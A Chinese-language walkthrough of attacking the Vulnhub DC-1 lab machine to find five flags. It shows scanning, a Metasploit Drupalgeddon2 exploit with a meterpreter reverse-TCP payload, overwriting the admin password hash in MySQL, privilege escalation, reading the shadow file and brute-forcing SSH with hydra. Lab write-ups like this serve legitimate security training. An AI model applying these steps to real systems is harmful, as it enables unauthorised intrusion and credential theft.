前言

我們都知道，對靶機的滲透，可以寬闊自己的解題思路，練習並熟悉相關操作命令，提高自己的能力。下面我就對Vulnhub的DC-1靶機進行滲透，靶機設置了5個flag，咱們依次找到它。並通過圖文形式講解涉及到的相關知識點。DC-1的靶機下載地址為：//www.vulnhub.com/entry/dc-1,292/
目標機IP地址：198.162.9.138
攻擊機kali IP地址：198.132.9.129
想要了解SQL注入原理的可以看我的這兩篇文章：
//www.cnblogs.com/lxfweb/p/13236372.html
//www.cnblogs.com/lxfweb/p/13275582.html
想要了解XSS原理的可以看我的這兩篇文章：
//www.cnblogs.com/lxfweb/p/12709061.html
//www.cnblogs.com/lxfweb/p/13286271.html

目標探測

滲透測試的第一步，是信息收集，這一步很重要，關係到後面的滲透步驟。下面我們對目標機進行主機發現。因為都在局域網，所以使用內網掃描。
命令：arp-scan -l

發現主機IP後，使用nmap進行端口掃描。
命令：nmap -v -A 192.168.9.138

發現目標機開放了22、80、111端口。

尋找flag1

現在我們以80端口作為突破口。通過指紋識別，這裡用到的是whatweb，發現是Drupal cms 版本是7。下面使用MSF進行滲透攻擊。打開工具，搜索Drupal的相關模塊。

這裡我選擇第4個模塊。讀者可以嘗試其他模塊。
輸入命令：use exploit/unix/webapp/drupal_drupalgeddon2 加載exploit。然後查看相關payload，輸入命令：show payloads

這裡選擇15，輸入：set payload php/meterpreter/reverse_tcp
接着輸入：show options 打開配置選項。

標為yes的都是必須配置的。現在配置一下RHOSTS(目標機IP)，LHOSTS(攻擊機IP)，其他默認就行了。
發現獲取到了meterpreter shell。現在查看一下目錄。

發現目標，找到flag1。

尋找flag2

查看flag1文件，發現有提示，咱們尋找配置文件。
接下來進入sites目錄下，接着進入default目錄。查看settings.php文件。

找到了flag2。

尋找flag3

我們發現配置文件中有數據庫賬號和密碼。現在嘗試登陸數據庫。
現在進入目標機shell環境，查看端口情況。命令：netstat -ano

我們注意到，數據庫只允許本地連接。所以，我們需要反彈一個shell出來。
採用python調用系統命令：

python -c 'import pty;pty.spawn("/bin/bash")'

發現反彈成功，接下來輸入數據庫賬號密碼連接MySQL數據庫。

下面，我們查看庫，查看錶。

找關鍵的表，發現裏面存在users表。打開它。

發現了admin賬戶和密碼。但是這個密碼有點複雜，破解有點困難。所以想想其他的方法。這裡我們登陸了對方數據庫，所以，我們採用對方的加密方式覆蓋掉原來的密碼就可以了。
先調用命令生成咱們設置的密文。明文是xfaicl。命令：php scripts/password-hash.sh xfaicl

接着替換掉原來的密碼。

update users set pass="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1
<s="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1;

替換成功後，咱們登陸網站。依次點擊，發現flag3。

尋找flag4

點擊flag3後，關注點放到passwd文件和shadow文件。Linux為了考慮安全性，用單獨的shadow文件存儲Linux用戶的密碼信息，並且只有root用戶有權限讀取此文件。所以下一步，我們要考慮的是提權了。
採用find提權。

提權成功後，查看shadow文件。

發現flag4是一個賬戶。猜測是ssh賬戶，這裡嘗試暴力破解。使用hydra破解成功。

破解到密碼是orange，接下來登陸ssh。發現flag4,查看它。

裏面內容說，還有一個flag4，在root目錄下，剛才咱們已經提升權限了。所以直接查看。